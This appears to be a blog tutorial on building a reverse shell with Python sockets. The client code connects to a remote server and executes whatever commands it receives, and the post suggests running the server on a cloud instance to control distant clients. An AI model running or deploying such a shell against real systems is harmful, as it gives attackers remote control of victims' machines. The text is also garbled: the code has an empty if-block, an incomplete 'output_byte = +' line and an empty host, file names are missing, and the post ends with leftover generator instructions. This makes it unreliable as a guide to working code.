Creating a Reverse Shell with Python Sockets


3 min read

Creating a Reverse Shell with Python Sockets

In the realm of cybersecurity, a reverse shell is a potent tool that allows a remote user to gain control over another system. While the concept might sound intimidating, reverse shells are employed for legitimate purposes like remote system administration and troubleshooting. In this blog post, we'll delve into the implementation of a basic reverse shell client-server system using Python's socket programming. We'll take a closer look at the code available in the GitHub repository here.

What is a Reverse Shell?

A reverse shell is a connection initiated by the target system (client) to a remote system (server). In the context of network programming, it allows the server to send commands to the client, which then executes these commands and sends back the results. This is achieved using socket programming in Python, making it a fundamental concept for those interested in network security.

Repository Overview

Github Repo Link: -

The GitHub repository contains Python code for a reverse shell client-server system. Let's explore the key components, along with explanations of important code lines:

The file represents the client side of the reverse shell. It establishes a connection to the server and continuously listens for commands. When a command is received, it executes it and sends back the output.

import socket
import os
import subprocess

s = socket.socket()
host = ''
port = 9999

s.connect((host, port))

The code above in initiates a connection to the server specified by host and port. It establishes a socket for communication.

while True:
    data = s.recv(1024)
    if data[:2].decode("utf-8") == 'cd':

    if len(data) > 0:
        cmd = subprocess.Popen(data[:].decode("utf-8"), shell=True, stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)
        output_byte = +
        output_str = str(output_byte, "utf-8")
        currentWD = os.getcwd() + "> "
        s.send(str.encode(output_str + currentWD))

In this part, the client listens for incoming data from the server. When it receives a command (in the form of bytes), it executes the command, captures the output, and sends it back to the server. This allows remote control of the client system.

import socket
import sys
import threading
import time
from queue import Queue

# ...

Similar to, represents another server-side implementation. It allows the server to establish a connection with a single client. is another example of the client-side code, performing similar functions as It connects to the server and listens for commands.

import socket
import sys
import threading
import time
from queue import Queue

# ...

In, the server-side code is designed to handle multiple client connections simultaneously. It uses multithreading to manage client interactions.

Testing the Reverse Shell

The README contains detailed instructions for testing the reverse shell on both a local and global network. To get started, run the server on one system and the client on another. The server can send commands to the client, which are then executed on the client's system.

In a global network, you can deploy the server on a cloud instance like AWS EC2 and establish a connection with a client located elsewhere.


Reverse shells can be powerful tools for remote administration and troubleshooting, but they also pose potential security risks. Understanding how they work is essential, both from a defensive and offensive perspective. This GitHub repository provides a basic implementation of a reverse shell client-server system using Python sockets, offering a foundational understanding of network security concepts.

The code provided can serve as an educational resource for those interested in comprehending the mechanics of reverse shells and socket programming in Python.

For a hands-on experience, consider trying out the code from the repository and experimenting with reverse shell connections in a controlled environment.

This enhanced blog post provides explanations for key code lines and highlights the significance of each script in the GitHub repository. Feel free to further customize it to meet your specific requirements or add more technical details as needed.